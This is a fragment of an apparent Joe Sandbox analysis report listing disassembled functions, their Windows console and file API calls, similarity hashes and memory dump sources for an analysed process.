                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Error$CurrentDirectoryModememset$Last
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1725644760-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 5aa19348ccbfb52e27d6116f941ec80b0f05ae1a555068ddd348204a32b0b58d
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: a81a02151554c6eb5717fe835cbc7fe8248b0dab817f17568e1a39102e8607ba
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5aa19348ccbfb52e27d6116f941ec80b0f05ae1a555068ddd348204a32b0b58d
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 80418F31A00219ABDF55DFA4EC85BEEB7F8EF08315F008199E905E7290EB78DA40CB55
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 0003B701 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 86COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • RoInitialize.API-MS-WIN-CORE-WINRT-L1-1-0(00000000,00000000,00000000,00000001), ref: 0003B717
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleWindow.API-MS-WIN-CORE-KERNEL32-LEGACY-L1-1-0 ref: 0003B72A
                                                                                                                                                                                                                                                                                                                                                                                                                          • RoUninitialize.API-MS-WIN-CORE-WINRT-L1-1-0(?,?,?), ref: 0003B7FC
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00018235: _get_osfhandle.MSVCRT ref: 0001824E
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00018235: SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00018256
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00018235: _get_osfhandle.MSVCRT ref: 00018264
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00018235: SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 0001826C
                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0003B76D
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleWindow.API-MS-WIN-CORE-KERNEL32-LEGACY-L1-1-0(?,?,?), ref: 0003B788
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Console$ModeWindow_get_osfhandle$InitializeUninitializememset
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: <
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1664749912-4251816714
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 4707180919be0e883af0df2f35ba6abe5700dbf62d170ec221c22996df46b8b2
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 23abc4d191f47410e2ff72e2f320d5e5aec52283fbf43f638c72c0beb94361e9
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4707180919be0e883af0df2f35ba6abe5700dbf62d170ec221c22996df46b8b2
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1D313EB5D00209AFDB11DFA9D485ADEBBFCEF49344F104116E905E3341EB349A45CB61
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 000181EC Relevance: 10.5, APIs: 7, Instructions: 41synchronizationCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,000000FF,?,?,?,00037FC9,?,000399AE,00000000,?,00000000,0002CF94,00000000,?), ref: 00018203
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetExitCodeProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,000000FF,?,00037FC9,?,000399AE,00000000,?,00000000,0002CF94,00000000,?), ref: 0001820E
                                                                                                                                                                                                                                                                                                                                                                                                                          • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,00037FC9,?,000399AE,00000000,?,00000000,0002CF94,00000000,?), ref: 00018229
                                                                                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00037FC9,?,000399AE,00000000,?,00000000,0002CF94,00000000,?), ref: 0002B0AB
                                                                                                                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00037FC9,?,000399AE,00000000,?,00000000,0002CF94,00000000,?), ref: 0002B0C1
                                                                                                                                                                                                                                                                                                                                                                                                                          • fprintf.MSVCRT ref: 0002B0D5
                                                                                                                                                                                                                                                                                                                                                                                                                          • fflush.MSVCRT ref: 0002B0E3
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$CloseCodeEnterExitHandleLeaveObjectProcessSingleWaitfflushfprintf
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4271573189-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: e819367f5a6ab123a492c43a3d68000184b17fff928edf23b569bdaab725c132
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 93bf0dc5d4534ef2fbac858c4b725c4f842735600276c974f4ee69cadd38fab8
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e819367f5a6ab123a492c43a3d68000184b17fff928edf23b569bdaab725c132
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CD014F75205610EFFB056BE8ED0EA9B7B6CAF06326F100344F115A21E2CBB91A409B66
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00023CD0 Relevance: 9.4, APIs: 6, Instructions: 438COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00023D30
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001E3F0: memset.MSVCRT ref: 0001E455
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00000000,?,?,-00000105,?,?,00000000), ref: 00023E3D
                                                                                                                                                                                                                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?,-00000105,?,?,00000000), ref: 00023E88
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset$FullNamePath
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3158150540-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 51d2a63681ce89f73518270df1f103f03374368fcdfffb41e74f7a40e24ccd70
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 30caaaf8bcac4958262f9c45b89b398ebbcfe6df07fe1ddbdb1bbdd00a830473
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 51d2a63681ce89f73518270df1f103f03374368fcdfffb41e74f7a40e24ccd70
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 75028235A002269BCB69DF68EC597B9B3F1FF48314F1841B9D80A97291D734AE82CF54
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 0001498F Relevance: 9.2, APIs: 6, Instructions: 157COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 0002858D
                                                                                                                                                                                                                                                                                                                                                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00028595
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000002), ref: 000285D4
                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 000285ED
                                                                                                                                                                                                                                                                                                                                                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 000285F5
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Console$Write_get_osfhandle$Mode
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1066134489-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 1ba5c6fc2f44704fe3d09b9b1058f45787906992fc606e5fec2ddafd16678788
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 1cd87844b9ffaba89c65bf01f0fe5425cd6f59b92b831731ae8c8b2cb6f69222
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1ba5c6fc2f44704fe3d09b9b1058f45787906992fc606e5fec2ddafd16678788
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D041C435B013219BDF249F78E88DAAEB3E8EF40355F14856AE806DB186EE74DD40CB51
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 0001B7A8 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • _tell.MSVCRT ref: 0001B7F9
                                                                                                                                                                                                                                                                                                                                                                                                                          • _close.MSVCRT ref: 0001B82C
                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0001B8CC
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(00007FE7), ref: 0001B936
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0004C9F0), ref: 0001B947
                                                                                                                                                                                                                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?), ref: 0001B96D
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ConsoleInfoOutput_close_tellmemset
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1380661413-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: c02528756a62afd7fc8462407f1e8a906f33a6c8e73ba5a17c56b75a3dae1027
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: e00fde201a21f7103b2b0b012818bfc5c9e8e24e93d070fd08eb8fac8d8b2f0f
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c02528756a62afd7fc8462407f1e8a906f33a6c8e73ba5a17c56b75a3dae1027
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4F41D8B0A043408BEB74DF28D9487AEB7E5AF86314F14092CE995972A1E738DCC5CB53
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00017F47 Relevance: 9.1, APIs: 6, Instructions: 104COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00017F7C
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001E3F0: memset.MSVCRT ref: 0001E455
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,-00000001,?,?,00000001), ref: 00017FC0
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00017FF3
                                                                                                                                                                                                                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?,-00000001,?,?,00000001), ref: 0001800C
                                                                                                                                                                                                                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?), ref: 0002B05A
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset$DriveInformationTypeVolume
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 285405857-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 0e76f3865fc8ced5ef914aecf6fe8654d55bdffbd40157ea97bd2166fa7e697b
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 7a8158a28441637a6522206eef1fde1ac5f4003cd51b77efdbc80939d2730d56
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0e76f3865fc8ced5ef914aecf6fe8654d55bdffbd40157ea97bd2166fa7e697b
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E1317C71A1021DABDF65CBA5DC88AEFB7BCEF08344F04456AE405E2150DB39DA84CB21
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 0001998D Relevance: 9.1, APIs: 6, Instructions: 89COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00019A11: _get_osfhandle.MSVCRT ref: 00019A1C
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00019A11: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0001793A,00000104,?), ref: 00019A2B
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00019A11: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,00017908,00002374,-00000001), ref: 00019A47
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00019A11: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00058E04,00000002,?,?,?,?,?,?,?,?,?,?,?,?,00017908,00002374), ref: 00019A56
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00019A11: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00017908,00002374), ref: 00019A61
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00019A11: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00058E04,?,?,?,?,?,?,?,?,?,?,?,?,00017908,00002374,-00000001), ref: 00019A6A
                                                                                                                                                                                                                                                                                                                                                                                                                          • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00058E04,?,?,?,00050AF0,00000002,?,?,0002A669,%s %s ,?,?,00000000), ref: 000199DC
                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 000199EC
                                                                                                                                                                                                                                                                                                                                                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,0002A669,%s %s ,?,?,00000000), ref: 000199F4
                                                                                                                                                                                                                                                                                                                                                                                                                          • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00058E04), ref: 00019A09
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00019B3B: _get_osfhandle.MSVCRT ref: 00019B4E
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00019B3B: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00050AF0,000000FF,0004A7F0,00002000,00000000,00000000), ref: 00019B8E
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00019B3B: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,0004A7F0,-00000001,?,00000000), ref: 00019BA3
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: LockShared$_get_osfhandle$AcquireConsoleFileReleaseWrite$ByteCharHandleModeMultiTypeWide
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4057327938-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 8dc1dadf8adbcd8a48d3f98ee939b0664bf4ab81b2f3320a81b0df515521d390
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: da95b488e6bae5b85f17ca468f8b0c6c260677ea864f651a29ecde21c5c80d70
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8dc1dadf8adbcd8a48d3f98ee939b0664bf4ab81b2f3320a81b0df515521d390
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7021D832344316ABF7346AE96CDAFAF22DC9B41756F14003EFA06D61C2EEA4CC448151
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00019B3B Relevance: 9.1, APIs: 6, Instructions: 88fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 00019B4E
                                                                                                                                                                                                                                                                                                                                                                                                                          • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00050AF0,000000FF,0004A7F0,00002000,00000000,00000000), ref: 00019B8E
                                                                                                                                                                                                                                                                                                                                                                                                                          • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,0004A7F0,-00000001,?,00000000), ref: 00019BA3
                                                                                                                                                                                                                                                                                                                                                                                                                          • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00050AF0,?,?,00000000), ref: 0002C0BC
                                                                                                                                                                                                                                                                                                                                                                                                                          • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00050AF0,00001000,0004A7F0,00002000,00000000,00000000,00050AEE), ref: 0002C0DC
                                                                                                                                                                                                                                                                                                                                                                                                                          • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,0004A7F0,00000000,?,00000000), ref: 0002C0FA
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: FileWrite$ByteCharMultiWide$_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3249344982-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 39c432b410f0e5aa94a8b55b1bf7f4eef7d4827ba28095d9525ebe58e1fd39b4
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: ea1f093c4a42a3030f53521faf99d365c5d14bfef4bc2a6a8e4b45a8368379f1
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 39c432b410f0e5aa94a8b55b1bf7f4eef7d4827ba28095d9525ebe58e1fd39b4
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7821EDB1648205BFFB204B64AD89FAB7BBDEB06711F200125FA01E6190D7B49D40CA65
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00037540 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 80COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001BC30: wcschr.MSVCRT ref: 0001BCA7
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001BC30: iswspace.MSVCRT ref: 0001BD1D
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001BC30: wcschr.MSVCRT ref: 0001BD39
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001BC30: wcschr.MSVCRT ref: 0001BD5D
                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 000375AC
                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 000375CB
                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 000375F1
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
